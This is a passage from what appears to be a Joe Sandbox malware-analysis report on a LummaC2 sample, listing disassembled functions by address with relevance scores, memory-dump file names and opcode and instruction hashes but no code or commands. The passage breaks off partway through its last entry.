Opcode Fuzzy Hash: 875264dfc931a2fa455465272561c574d9cbdccec64d013bfd711a17f671b072
Instruction Fuzzy Hash: A2816B72E066149BC725AF18C880A7FB3A3EFD5710F19C92DD8858B394DB34AD11D785

Function 0046D560 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c2fadea81302665318e5da7031cb965334990beefaff8b48689185bc03a157
Instruction ID: 4357928629cfc9668b5ee9cc6d680ed6c1fe8307df9a0a6d156691f88f9c35b3
Opcode Fuzzy Hash: 82c2fadea81302665318e5da7031cb965334990beefaff8b48689185bc03a157
Instruction Fuzzy Hash: 21914A72E042618FCB158E28C85139F7BE1ABD5325F19863EE8B9873D1D7389C0697C2

Function 00477D94 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c06e216b118cfbca77ddfdf7093682435e0c9113c38827ba284ee3e7e0566ad
Instruction ID: 24de5afbd90d74b7dc3c84339b2c082528fb7460e64901345d5668941d901ded
Opcode Fuzzy Hash: 1c06e216b118cfbca77ddfdf7093682435e0c9113c38827ba284ee3e7e0566ad
Instruction Fuzzy Hash: E19134B6900205CFDB14CF95E8947AEB7B1FF58314F19817EE9056B352C779A806CB88

Function 004874F0 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455930222367e1dcb6dd8e44a1e7cb35dd6bd0b838120fc5338f1a00ba8815a2
Instruction ID: 9c08ae87f1a86d8ff7b6c01f2902c1693cc5163316ffe381fa79d5ead025b53b
Opcode Fuzzy Hash: 455930222367e1dcb6dd8e44a1e7cb35dd6bd0b838120fc5338f1a00ba8815a2
Instruction Fuzzy Hash: C16135712182009BD314AF68DC95B6F77D2EBD0308F288C3EE485C7291EB79D905C79A

Function 0048A0D0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55be95f9da8f171af8d84705676b2a2e05d6282366c888efe3fbec262744b4ea
Instruction ID: 34589fc34215ccff63dec093cf09270872f9b479b08c0009e53d2ccca1065fb6
Opcode Fuzzy Hash: 55be95f9da8f171af8d84705676b2a2e05d6282366c888efe3fbec262744b4ea
Instruction Fuzzy Hash: CE5159756083048FFB28AF24D85572F77D1EB96704F188C7FD58297382E67AAC11878A

Function 0048A510 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc7bdfebece416fdc7b2375c7407cd75567daeb3f3e43cdf5755f76cf4f5e05c
Instruction ID: a1ab97d2f6fd2518acf1b87978b40f13f851552cbc09b2bbea1e08f089542764
Opcode Fuzzy Hash: cc7bdfebece416fdc7b2375c7407cd75567daeb3f3e43cdf5755f76cf4f5e05c
Instruction Fuzzy Hash: D7512935A043105FE720AF2988C066BB792EB95714F198D7FC4C167355D7B99C22878A

Function 0046DFC0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d065d3580498b795cb6d977f0a5c2a94c045f6c7fd51de87f90b5ce72454d8dd
Instruction ID: 8d228b4ec64e2f92a3153b1a237ebc499c214d04753964fa423f0137e314688c
Opcode Fuzzy Hash: d065d3580498b795cb6d977f0a5c2a94c045f6c7fd51de87f90b5ce72454d8dd
Instruction Fuzzy Hash: EC615D37789A904BD328997D4C622A679D30BD7330B3D877FD6B18B3E1E9A94C025346

Function 004730E0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8faa367402398030bb80234ce485bfa8c5a08849ccc2aa023a950f98f21379
Instruction ID: 3a202069c5b525c94a59760f185441e3cba36b57ff37bd67051430c3de99e33e
Opcode Fuzzy Hash: 0d8faa367402398030bb80234ce485bfa8c5a08849ccc2aa023a950f98f21379
Instruction Fuzzy Hash: B351C435A18202CBE728CF28DC61B6A73E2FBD8311F09867DE845D7694DB79D912CB44

Function 00485FF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction ID: 8ef613003c03f698b62a52df1cf41b45af2f6f95963028e204a81f2e28e27d0c
Opcode Fuzzy Hash: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction Fuzzy Hash: D1515BB15087548FE714EF29D89435FBBE1BB84318F054E2EE4E587351E379DA088B86

Function 004692C0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 745d50fb1878e646bbac702d1dd23585241dbc6833ded943554dc79e07be44c5
Instruction ID: 4ad228cce5b1b5a899043097c044bc9f9017b6c9714cd3c5595fcf92891d3712
Opcode Fuzzy Hash: 745d50fb1878e646bbac702d1dd23585241dbc6833ded943554dc79e07be44c5
Instruction Fuzzy Hash: ED5137B29042108BC7208F64DC52AAB73E4FF9A364F08457AFC95873A1F7789C55C75A

Function 0045EDB4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7df5497df62a5c0baf4f354cc61071de4567440c131c1140f36ab3a2d1066c8a
Instruction ID: 2bd5a4ec90743a8589d757d175808d4a6bdd5caaf63a553dcabe28624ed668c8
Opcode Fuzzy Hash: 7df5497df62a5c0baf4f354cc61071de4567440c131c1140f36ab3a2d1066c8a
Instruction Fuzzy Hash: 735126756082808FD328CF29D8817BFB7E2ABE5315F24C92ED88697356DB3548468789

Function 0047B078 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ec8a4fd61888772d00c5b7fd6e9a3ca19499cd398cf74488ed149ef066872a
Instruction ID: 40eb2755feb377e384eb6da6cf9fdadac73cf918c61de3c73aeb08085736019e
Opcode Fuzzy Hash: b2ec8a4fd61888772d00c5b7fd6e9a3ca19499cd398cf74488ed149ef066872a
Instruction Fuzzy Hash: 904106A460C3C19BE739CF2998B07B77BD0DF62344F28886EE4DA4B342D6784505879A

Function 00487D00 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3cfddea3c2262270a9deadfb44395458904236056cad9b27dd8a56d2d0c548
Instruction ID: 710a7c244ea5dc2ee2ca480d330b2cbba1983a584bcad2f6cf30e0ca6fe9c661
Opcode Fuzzy Hash: 5d3cfddea3c2262270a9deadfb44395458904236056cad9b27dd8a56d2d0c548
Instruction Fuzzy Hash: 204104B2A083145BE714BE55DC91B7FB7E5EF81708F240C2EF88593241E63AED04879A

Function 00487EA0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction ID: 755dc5680abcb629aa8435c9a8a4dd09b9ec3b5270e87464147af5e8f958d063
Opcode Fuzzy Hash: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction Fuzzy Hash: E541F633A196104BD308DE398C5026FBA936BC5334F2ACB3EEAB5973D5DA7988054385

Function 0048F040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70a5bba2fb4f1658106ffa9f8425dfb2e99fbb0740c2a77e689c697cfe649b2d
Instruction ID: 5be3f57809d6d1c1243b5240d679556da9d98f42533fd07cdb77efc8603c187a
Opcode Fuzzy Hash: 70a5bba2fb4f1658106ffa9f8425dfb2e99fbb0740c2a77e689c697cfe649b2d
Instruction Fuzzy Hash: 31410371705304EFE2149A19DCC0B7BB3A6EB8A718F24893EE08597251CA78BC15C759

Function 0048B46A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe60b55d3455d4ffd9f36b2e9d6f31f47a09e6f2de66471223975fdd00ba50c3
Instruction ID: 9398c6d4302ce2055c030dde7eabfa2eb73dbf3f01581f56e765ca2555c8fd3e
Opcode Fuzzy Hash: fe60b55d3455d4ffd9f36b2e9d6f31f47a09e6f2de66471223975fdd00ba50c3
Instruction Fuzzy Hash: 904138B6E106029BC708DF39DC616BDBBA2FB96300B08863DD412E7365E7386555CB89

Function 00466D52 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8efb950e4f8c54b66eeb13bc9ffbb364bdd54f8d1b342c13d2745f6a10d3b62b
Instruction ID: c6db46ad775cef527ed8007f0bf74f368df78f1b1dbd18bea649cd9300a3af62
Opcode Fuzzy Hash: 8efb950e4f8c54b66eeb13bc9ffbb364bdd54f8d1b342c13d2745f6a10d3b62b
Instruction Fuzzy Hash: 2F11A2B57086018BD3288B25D8811277792EBEA319F2A857EC0CA93311E6388C568A4B

Function 00458A20 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction ID: 44ad7e849623c264a09008c95dfe11504bb75a474a5b907bbcfb4e1ce0021033
Opcode Fuzzy Hash: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction Fuzzy Hash: 0C21FB77E619204BE310CD56CC803527796A7C9339F3EC6B8C9689B392D93BAD0786C4

Function 0048BCDB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a7d758e0ea20c9bd4f6435e2c5ab0f09c451a83548911d9aeb7e4b25e4e33e9
Instruction ID: 215440d35b84cfac02bc1efc48c5d2ab380cc0ea01e9d1d415211af1a2b62c5e
Opcode Fuzzy Hash: 5a7d758e0ea20c9bd4f6435e2c5ab0f09c451a83548911d9aeb7e4b25e4e33e9
Instruction Fuzzy Hash: AD110372E146118FCB18CF69CC512BAB7B2EB95200B19C566C855A7308E73CA812CBD8

Function 00469605 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc1fe2cf1a5bd14ef6097e3b511bc2533f9a1f23f2c237572ef68a9ab1217da
Instruction ID: 34c18f877605ee0d5aed0c22a844cf9fd8ce444b25316a1396009cbe31b42794
Opcode Fuzzy Hash: ddc1fe2cf1a5bd14ef6097e3b511bc2533f9a1f23f2c237572ef68a9ab1217da
Instruction Fuzzy Hash: 8721A73260D7509BC7798B28D4912ABB396BBD5714F15493FC48B43220DB759C42CB8A

Function 00478640 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f3be0a680eaf1045af03ba9646d33fbae44e147c813427b8e7c976dcfc0b7fb
Instruction ID: dc0c197b412d1a8c2cb488eabd454bff92aa4b794c28e0d53dda361650e54f79
Opcode Fuzzy Hash: 3f3be0a680eaf1045af03ba9646d33fbae44e147c813427b8e7c976dcfc0b7fb
Instruction Fuzzy Hash: 3B01C035989210EFC7189F10D44187BB7B1EBA6714F25987ED48663252CB38EC068B8A

Function 00479DA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction ID: 509284eed2dbeed4696076166902333d405b88a472ad75f7e9d0b28777560f43
Opcode Fuzzy Hash: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction Fuzzy Hash: A2015EF660030157DB30DE65E5C1B6BA2A8AF95708F18843EE80957342EB6AEC19C799

Function 004646C0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: 217979d425a7c676692269f3b4d226723b26f53ae788d0ee347192497efe4dc4
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: C701267BA013028B8324CE9CC0D06ABB3B0FFD6B92B2A445ED5801F370D7319C15C225

Function 004710F3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c4f0437d6d54c0c73847b6de532445433358836aa90678f65c25ca96e37d04
Instruction ID: 2b285a3311ffa6781eac20fe5921b4664e4626f6002d607f7d28bc54265d077e
Opcode Fuzzy Hash: a2c4f0437d6d54c0c73847b6de532445433358836aa90678f65c25ca96e37d04
